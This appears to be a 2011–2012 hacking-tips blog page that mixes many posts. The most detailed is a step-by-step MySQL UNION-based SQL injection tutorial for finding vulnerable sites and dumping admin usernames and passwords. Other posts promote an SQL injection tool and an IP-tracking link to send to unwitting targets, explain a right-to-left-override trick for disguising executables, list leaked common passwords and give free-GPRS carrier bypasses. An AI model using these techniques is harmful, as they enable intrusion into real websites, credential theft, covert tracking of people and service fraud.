Hack Websites Using HexJector

Hexjector is an Opensource,Multi- Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties.

Trick To Use Multiple Email ID’s From Single Gmail Account

You hack and ID in the e-mail can be made, so you might be a bug in the phone or ID gmail.If moves to a single Gmail ID can use it many times in a single to create a separate email account required to register, I abc.com I have two accounts for a separate account to e-mail id that I must use. Suppose this approach a single account for any e-mail using the site will be able to register more than once.

Free Developer Preview of Windows8

After a long waiting of windows lovers Microsoft has released pre-beta version of new windows OS called windows 8 ,windows 8 developer preview version is now available for download at Microsoft’ site for free.Both 32 bit and 64 bit version of the windows 8 iso files can be downloaded from microsoft website.

Find product key of windows 7 inside the CD-disk

If you forgot the Product KEY of win7 then this artical will be very usefull for you...

20 Great Google Secrets

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number...

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, January 25, 2012

Hack Websites Using HexJector v1.0.73

Hexjector is an Opensource,Multi- Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties.
Features:
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Detect WAF on the site.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection .

Download HexJector.v1073
http://www.sourceforge.net/projects/hexjector/files/Hexjector%20(Win32)/Hexjector%20v1.0.7.4.zip/download

Enjoy...
do comment about this below...

You might also like:

Tuesday, September 27, 2011

Find product key of windows 7 inside the CD-disk

If you forgot the Product KEY of win7 then this artical will be very usefull for you... 

Saturday, January 29, 2011

NEW TRICK OF HACKING YAHOO ID

Hi It is possible and it is easy,I have tried the method a least a dozen times and it has worked on all but 2 occasions, I don't know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address. This is how it is done:

AN EASY WAY TO HACK A WEBSITE

If you have the html and javascript knowledge then you can access password protected websites. S
o you want to know how??
keep reading.....

Top 20 Hacking Tools


These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Snort is an open source network intrusion detection system capable of performing real-time traffic analysis and packet logging on IP networks.
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump is the most used network sniffer/analyzer for UNIX.TCPtrace analyzes the dump file format generated by TCPdump and other applications.
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against webservers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
John the Ripper is a fast password cracker, currently available for many flavors of Unix.
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
Tripwire is a tool that can be used for data and program integrity assurance.
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.
IP Filter is a software package that can be used to provide network address translation (NAT) orfirewall service
OpenBSD Packet Filter
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Java Hacks To Hack Facebook For Fun


There are lot of greaseymonkey scripts , Javascripts and addons that help you in converting your facebook look and functionality as per you need .If you are interested then you can install and use them as per your need .
ther are some cool java codes that makes facebook more friendly or in other words java helps yours journey smooth in facebook.Just copy the code and put them in adress(URL) bar and hit enter and you are done .
You can get a list of all popular java codes from facebook javascript list .

Find Location, Operating System, Browser Details Of Anyone On Internet With This Simplest Method


Tracing IP Address is not a tough job, it can be done with various tools and method. Today I am sharing the best and simple method with which you can not only trace any IP Address easily but can also see that the target is using which Operating and Internet Browser.
Lets start :
Step 1) Visit this link and enter your email id in it. You will receive your trace reports in it.
Step 2) At the bottom click on Submit and Register.
Step 3) Open your mail that you entered in Step 1
Step 4) You will receive a link in your inbox like this http://acmepeers.com/?u=vyg (Mostly its in Spam)
Just follow the instructions in the mail you received.
Send this link to one who’s information who want to know. As soon as anyone clicks on the link given above, a trace report will be generated and mailed to you. You can click the above link yourself to check the accuracy of the system by tracing yourself.
Its a tried and working method.

Want to increase Your Airtel broad band Speed To 2MBPs??


Though its not a hack but Airtel is the only service provider in India which is providing 2MBPS on demand, so I would like to share about this.
speed on demand airtel 300x69
Here is the trick to get 2 MBPS on Airtel broadband
#All you need is a Airtel Broadband connection.
Airtel no : User name
Account no: password
Now all you have to do   is
#Go to your modem/router
By typing
192.168.1.1
# Default user and pass= admin & password# Now there in the left bar click on WAN and then click on edit
beetal router settings screenshot 300x210
# Click on next until you get the following screen
Now in the username and password field enter the following:
3userpass www 84productions blogspot com
# PPP Username : 123xxxxxxxx_dsl@airtelbroadband.in
(Enter your username and password)
Now in the password field type the account no. or new password if you have changed.
Then save the settings and reboot.
Now how to get 2 MBPS speed??
I’m sure many of you are aware of speed on demand from Airtel.
Go to this page: CLICK HERE
Bandwidth+on+demand
And now enter your and password that you have entered in the router.
and click on 2MBPS and activate it.
Bingo! now you are using 2 MBPS Airtel connection!! icon smile
Do remember you will be charged as 120/hr.
Updated news is Tata launched the 100 MBPS internet connection in mumbai @ 10,500/month.
For Further Reading:

NobelCom.com offers 15 minutes trial call to India


NobelCom.com is the first retail website launched by NobelTel, Ltd. Founded in 1998. NobelCom provides online customers with a secure way to purchase affordable, easy-to-use prepaid phone cards. This is one of the few phone cards websites to offer live EXCELLENT customer support 24 hours a day, 7 days a week. NobelTel, Ltd. is based in Bermuda, with global offices in North America, Latin America, Eastern Europe and Western Europe.

To increase their business, They are offering 15 minutes of free trial calls, per registered US/Canada number, to anywhere in the world, including India, If you have two phone, then you can register both the numbers two times and can get 30 minutes of free calls.

STEP 1 (Registration)
You need to register your true phone number and a valid email, you will be able to make 15 min call from this phone only.


STEP 2
An email with subject (Trial Order Confirmation) will be sent to you with a link to confirm your request. Open your registered email and click on the confirmation link.
Once you confirm your link, you will receive a call from Noblecom for approval.
(In the case you are not able to pick up the phone, you will receive a mail with subject (Nobelcom.com Approvals Team not able to reach you) in that case you have to call their toll free customer care number 800-406-3767)
After confirmation call from noblecom, you will receive another mail with subject (Your order) mentioning your username, password, your registered numbers and access numbers and also calling instructions,

STEP 3
Start using your free Nobelcom minutes without entering a PIN!, please use the following calling instructions
1. Enter the toll free access number only from your registered number
1-800-xxx-xxxx (English)
1-800-xxx-xxxx (Spanish)
A voice prompt will ask you to enter your destination number.
2. Enter your destination number followed by the pound (#) key.
Domestic Calls: Dial 1 + area code + phone number + the pound (#) keyInternational Calls: Dial 011 + country code + city code + phone number + the pound (#) keyA second prompt will announce the amount of minutes available for your destination and your call will be connected, Enjoy your free minutes!

Friends outside US/Canada, Please do not try, It will not work (If you are ready to try and it works, please write a comments)

If you find any such sites, please share it to all so that everybody can take the advantages.
Upcoming Blogs:
1. 15 mins of free calls, per month and for each phone in India (if you have 10 phones of relatives and friends, to call to India, then 150 mins per month, absolutely free)
2. Free 1.80 USD calling card and many more, keep visiting...

You might also like:

Friday, January 28, 2011

Directly executable .txt?Yes!


I’m sure you know the good old trick with hidden extension, or multiple extensions, long file names, etc.. Today, we’re going to look at much more sophisticated way of confusing users. Did you think, that when you’ve got some file and clearly see, that the extension of this file is .txt, the file’s not directly executable? You were wrong.

How is it possible? It’s quite simple – thanks to UNICODE and its special characters. Namely the special character RLO (Start of right-to-left override).

6a00e5539a104188340148c690726c970c-800wi
Just take a file, name it “txt.exe”, insert the RLO character before it and.. the filename changes to “exe.txt”. However, it’s still executable file and the real extension is “.exe”. This could be definitely very confusing for users and also dangerous, so be careful and better scan your files (at least those downloaded from internet) before opening them.


Get more information about it @http://www.fileformat.info/info/unicode/char/202e/index.htm
You might also like:

Most Common Passwords used by people for online accounts:


Most people are clueless as to how accounts are hacked and their passwords reflect that. If you find anything in common with the most common passwords below you havePasswordsa weak password. This is to help people choose a strong password and possibly help site admins understand the risks.

There has been three instances that I know of where a significant number of hacked account passwords have been publicly released. I have obtained the lists and made a thorough analysis of each of them, including the most common passwords and character frequencies. In total, there were 116782 passwords.

Rank    %    Repetitions    Pass
1    1.12    1308    123456
2    0.73    854    password
3    0.35    414    phpbb
4    0.25    294    qwerty
5    0.24    281    12345
6    0.23    265    jesus
7    0.22    253    12345678
8    0.17    195    1234
9    0.16    187    abc123
10    0.16    185    letmein
11    0.13    147    test
12    0.12    143    love
13    0.11    133    123
14    0.11    124    password1
15    0.1    121    hello
16    0.1    118    monkey
17    0.1    115    dragon
18    0.1    112    trustno1
19    0.09    107    111111
20    0.09    105    iloveyou
21    0.09    102    1234567
22    0.08    98    shadow
23    0.08    95    123456789
24    0.08    95    christ
25    0.08    93    sunshine
26    0.08    92    master
27    0.08    90    computer
28    0.08    88    princess
29    0.07    84    tigger
30    0.07    83    football
31    0.07    79    angel
32    0.07    76    jesus1
33    0.07    76    123123
34    0.07    76    whatever
35    0.06    74    freedom
36    0.06    73    killer
37    0.06    71    asdf
38    0.06    71    soccer
39    0.06    71    superman
40    0.06    71    michael
41    0.06    66    cheese
42    0.06    65    internet
43    0.06    65    joshua
44    0.05    64    fuckyou
45    0.05    64    blessed
46    0.05    63    baseball
47    0.05    59    starwars
48    0.05    59    000000
49    0.05    58    purple
50    0.05    58    jordan
51    0.05    58    faith
52    0.05    57    summer
53    0.05    57    ashley
54    0.05    56    buster
55    0.05    55    heaven
56    0.05    53    pepper
57    0.04    52    7777777
58    0.04    52    hunter
59    0.04    51    lovely
60    0.04    51    andrew
61    0.04    51    thomas
62    0.04    51    angels
63    0.04    50    charlie
64    0.04    50    daniel
65    0.04    49    1111
66    0.04    49    jennifer
67    0.04    49    single
68    0.04    49    hannah
69    0.04    48    qazwsx
70    0.04    48    happy
71    0.04    48    matrix
72    0.04    48    pass
73    0.04    48    aaaaaa
74    0.04    47    654321
75    0.04    47    amanda
76    0.04    47    nothing
77    0.04    46    ginger
78    0.04    46    mother
79    0.04    46    snoopy
80    0.04    46    jessica
81    0.04    46    welcome
82    0.04    45    pokemon
83    0.04    45    iloveyou1
84    0.04    45    11111
85    0.04    45    mustang
86    0.04    45    helpme
87    0.04    44    justin
88    0.04    44    jasmine
89    0.04    44    orange
90    0.04    44    testing
91    0.04    43    apple
92    0.04    43    michelle
93    0.04    42    peace
94    0.04    42    secret
95    0.04    42    1
96    0.04    42    grace
97    0.04    42    william
98    0.04    41    iloveyou2
99    0.04    41    nicole
100    0.04    41    666666
101    0.04    41    muffin
102    0.04    41    gateway
103    0.04    41    fuckyou1
104    0.03    40    asshole
105    0.03    40    hahaha
106    0.03    40    poop
107    0.03    40    blessing
108    0.03    40    blahblah
109    0.03    39    myspace1
110    0.03    39    matthew
111    0.03    39    canada
112    0.03    39    silver
113    0.03    39    robert
114    0.03    39    forever
115    0.03    38    asdfgh
116    0.03    38    rachel
117    0.03    38    rainbow
118    0.03    38    guitar
119    0.03    37    peanut
120    0.03    37    batman
121    0.03    37    cookie
122    0.03    37    bailey
123    0.03    37    soccer1
124    0.03    37    mickey
125    0.03    37    biteme
126    0.03    36    hello1
127    0.03    36    eminem
128    0.03    36    dakota
129    0.03    36    samantha
130    0.03    36    compaq
131    0.03    35    diamond
132    0.03    35    taylor
133    0.03    35    forum
134    0.03    35    john316
135    0.03    34    richard
136    0.03    34    blink182
137    0.03    34    peaches
138    0.03    34    cool
139    0.03    34    flower
140    0.03    34    scooter
141    0.03    33    banana
142    0.03    33    james
143    0.03    33    asdfasdf
144    0.03    33    victory
145    0.03    33    london
146    0.03    33    123qwe
147    0.03    33    123321
148    0.03    32    startrek
149    0.03    32    george
150    0.03    32    winner
151    0.03    32    maggie
152    0.03    32    trinity
153    0.03    32    online
154    0.03    32    123abc
155    0.03    32    chicken
156    0.03    32    junior
157    0.03    32    chris
158    0.03    31    passw0rd
159    0.03    31    austin
160    0.03    31    sparky
161    0.03    31    admin
162    0.03    31    merlin
163    0.03    31    google
164    0.03    31    friends
165    0.03    31    hope
166    0.03    31    shalom
167    0.03    30    nintendo
168    0.03    30    looking
169    0.03    30    harley
170    0.03    30    smokey
171    0.03    30    7777
172    0.03    30    joseph
173    0.03    30    lucky
174    0.03    30    digital
175    0.03    30    a
176    0.03    30    thunder
177    0.03    30    spirit
178    0.02    29    bandit
179    0.02    29    enter
180    0.02    29    anthony
181    0.02    29    corvette
182    0.02    29    hockey
183    0.02    29    power
184    0.02    29    benjamin
185    0.02    29    iloveyou!
186    0.02    29    1q2w3e
187    0.02    29    viper
188    0.02    29    genesis
189    0.02    28    knight
190    0.02    28    qwerty1
191    0.02    28    creative
192    0.02    28    foobar
193    0.02    28    adidas
194    0.02    28    rotimi
195    0.02    28    slayer
196    0.02    28    wisdom
197    0.02    27    praise
198    0.02    27    zxcvbnm
199    0.02    27    samuel
200    0.02    27    mike
201    0.02    27    dallas
202    0.02    27    green
203    0.02    27    testtest
204    0.02    27    maverick
205    0.02    27    onelove
206    0.02    27    david
207    0.02    27    mylove
208    0.02    27    church
209    0.02    27    friend
210    0.02    27    god
211    0.02    27    destiny
212    0.02    26    none
213    0.02    26    microsoft
214    0.02    26    222222
215    0.02    26    bubbles
216    0.02    26    11111111
217    0.02    26    cocacola
218    0.02    26    jordan23
219    0.02    26    ilovegod
220    0.02    26    football1
221    0.02    26    loving
222    0.02    26    nathan
223    0.02    26    emmanuel
224    0.02    26    scooby
225    0.02    26    fuckoff
226    0.02    26    sammy
227    0.02    26    maxwell
228    0.02    25    jason
229    0.02    25    john
230    0.02    25    1q2w3e4r
231    0.02    25    baby
232    0.02    25    red123
233    0.02    25    blabla
234    0.02    25    prince
235    0.02    25    qwert
236    0.02    25    chelsea
237    0.02    25    55555
238    0.02    25    angel1
239    0.02    25    hardcore
240    0.02    25    dexter
241    0.02    25    saved
242    0.02    25    112233
243    0.02    25    hallo
244    0.02    25    jasper
245    0.02    25    danielle
246    0.02    25    kitten
247    0.02    24    cassie
248    0.02    24    stella
249    0.02    24    prayer
250    0.02    24    hotdog
You might also like:

Just Anonymous Surfing:


Anonymous surfing allows you to surf the web without leaving a trail of particulars about your browser, your computer system, your country, IP address, etc. This is usually done by entering the address (URL) of the site you wish to go to at the free anonymous surfing proxy site, and that site will retrieve the page for you and present it to you.
The site you visit will not receive any particulars about your system, your IP address etc. because the proxy will not have transmitted such particulars to it. This is a selection of some of the best freeware (free) services for anonymous surfing online:


  • Anonymouse – allows you to surf the web without revealing any personal information. Instead of your computer transmitting the data directly to the recipient (Web-, News- or Email-Servers), these are transmitted to the Anonymouse server. The Anonymouse server anonymizes the transmitted data and continues to transmit these then to the actual recipient. A possible response (Web-Server) of the recipient is transmitted over the Anonymouse server back to you. Works well and can be used without any payment, so useful for free anonymous surfing.
  • Proxify - is a web-based anonymous proxy service which allows anyone to surf the Web privately and securely. Unlike other proxies, there is no software to install or complicated instructions to follow. Just enter a URL (website address) in the form above. Through Proxify, you can use websites but they cannot uniquely identify or track you. Proxify hides your IP address and our encrypted connection prevents monitoring of your network traffic. Once using Proxify, you can surf normally and forget that it is there, protecting you.
  • Megaproxy – is a medium that handles web requests on your behalf in order to preserve the privacy and integrity of your Internet experience. When using Megaproxy your web requests are first sent to Mega proxy which processes and filters them for your security as quickly, and usually quicker, than if they were sent directly to the target web site. On average, the process is completed within ten milliseconds. Because the connection to the Megaproxy service is encrypted with 128bit SSL encryption, neither the target web site nor the Internet Service Provider is able to determine where you are from, from where you are surfing, or what content you are downloading.
  • The Cloak – HTTP and HTTPS anonymous proxy: hide your identity from the sites you visit. Encrypted connection: hide your surfing from local snooping. Remote cookies: keep cookies at our site, and delete them after each session. User configurable content filtration: selectively remove JavaScript, Java, and active content. FREE anonymous browsing. The Cloak sits between your computer and any web sites you visit. It prevents the web sites you visit from finding out who you are, and therefore offers anonymous browsing. And it can use the standard SSL protocol to encrypt all communication from your browser, so that no one (except for the-Cloak) knows where you are surfing.
  • Shadow – allows you to browse the Internet anonymously. With a choice of 5 different countries to choose from, you will always be able to find a proxy server to make your Internet browsing experience truly anonymous. Compatible with Windows 98, 2000, and XP. You can surf HTTP and FTP URLs and Anonymous FTP surfing is also supported.
  • StealthMessage – is a secure messaging system designed for communicating sensitive and confidential information. It protects your privacy, allowing you to communicate in complete confidence with friends and colleagues. You don’t need to install any software to use Stealth Message, since the recipient is sent a URL and keyword combination that they then use to access your message via the Web. For the truly paranoid, you can even specify a time delay after which the message will “self-destruct” and no longer be accessible to the recipient. Messages are untraceable, and there are multiple back-up security systems in place to ensure that the content of your messages can not be accessed except by legitimate recipients. Special options help prevent recipients from accidentally making copies, forwarding your messages, or allowing them to be seen by prying eyes.
  • IDZap – allows you to surf the web anonymously via the ID Zap gateway service. Optionally, you can decide to block cookies and JavaScript. You have to register before you can start using the service.
  • BeHidden – allows users to surf Internet anonymously without anyone monitoring and knowing the sites they visit. The service hides your IP address from the sites you visit, and encrypts all communications with them. It also disables JavaScript and blocks cookies. Free service limited to 50MB/per day.
You might also like:

How To Block a Website:


How To Block a Website:There are many reason why you need to know how to block a website. Some of the most common reasons are you have been targeted by spammers who use adware and popups to attack your PC. Other reasons may be to prevent your children from having access to certain site content such as porn and gambling.
Depending on the level of security you wish, learning how to block a website may require a adjustments of your web browser, the use of internet filtering software or editing of your host file. At any rate you can try all methods to see which works best for you.


Block a Website using Internet Explorer:
Internet Explorer version 5 and later offer the ability for heighten security and privacy. You can block a site by following the directions below:

  • Load your Internet explorer
  • Click Tools
  • Click Internet Options
  • Click the Privacy tab
  • Under the Privacy window, Click Sites
  • Type in the site address that you want to Block and Click OK.

    Remember this technique only blocks on one site at a time. Parental control software will allow you to block multiple sites and categories.


    Other way to block a website using Internet Explorer:
    Click Tools ->Internet Options->Security->Restricted sites->Sites->Type in the site address and Click ADD then click OK.


    Block A Website in All Web Browsers:
    This action will require you to edit your Host file. Your host file is a computer file used to store information on where to find a node on a computer network.


    Here are the steps in Windows XP:
    • Click Start->All Programs->Accessories->Command Prompt2.
    • Click Command Prompt This will open a DOS command window.
    • Type: notepad C:/Windows/System32/drivers/etc/hosts
    • Locate the line 127.0.0.1 localhost
    • To block the website google.com for example, just add this text under 127.0.0.1 localhost:
    127.0.0.1 google.com
    127.0.0.1 www.google.com
    • You can add as many sites any site, However you will need to prefix it with "127.0.0.1".
    • Save the file

    Google will now be blocked in all web browser. This is an advanced but easy method on how to block a website.
    You might also like:

    VIDEOCON MOBILE FREE GPRS HACK TRICKS FOR GSM USER

    Homepage : Any

    Proxy :  On

    Proxy Address : 10.202.5.145

    Port : 8799

    APN ( Access Point ) : vgprs.com

    Working All States, Check Your State And Leave Comments

    Enjoy With Videocon...

    LATEST AIRTEL FREE GPRS UNLIMITED DOWNLOADING TRICKS

    With out Spending Single Paise

    Use As AirtelLive Gprs Settings

    Goto http://0.facebook.com.www.desiden.mobi/download

    Download All Content Without Charges

    Enjoy With Airtel

    Learn How To Hack Websites , Mysql Injection Tutorial

    SQL Injection in MySQL Databases SQL Injection
    attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database. Step 1: When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: www.site.com/page=1 or www.site.com/id=5 Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example: www.site.com/ page=1' If the database is vulnerable, the page will spit out a MySQL error such as; Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/ wwwprof/public_html/readnews.php on line 29 If the page loads as normal then the database is not vulnerable,
    and the website is not vulnerable to SQL Injection. Step 2 Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: www.site.com/ page=1 order by 1-- http:// www.site.com/page=1 order by 2-- http://www.site.com/page=1 order by 3-- http://www.site.com/page=1 order by 4-- http://www.site.com/ page=1 order by 5-- If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. Step 3 We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, for example: www.site.com/page=1 union all select 1,2,3,4-- This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. Step 4 We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: user() database() version() or if these dont work try... @@user @ @version @@database For example the url would look like: www.site.com/ page=1 union all select 1,user() ,version(),4-- The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and
    column names, programs can be used to do this. Step 5 In this step our aim is to list all the table names in the
    database. To do this we enter the following command after the url. UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- So the url would look like: www.site.com/ page=1 UNION SELECT 1,table_ name,3,4 FROM information_ schema.tables-- Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. Step 6 In this Step we want to list all the column names in the database, to do this we
    use the following command: union all select 1,2,group_concat(column_ name),4 from information_ schema.columns where table_ schema=database()-- So the url would look like this: www.site.com/page=1 union all select 1,2,group_concat (column_name),4 from information_ schema.columns where table_ schema=database()-- This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. Step 7 Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command, union all select 1,2,group_ concat(username,0x3a,password),4 from admin-- So the url would look like this: www.site.com/page=1 union all select 1,2,group_concat (username,0x3a,password),4 from admin-- Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

    Twitter Delicious Facebook Digg Stumbleupon Favorites More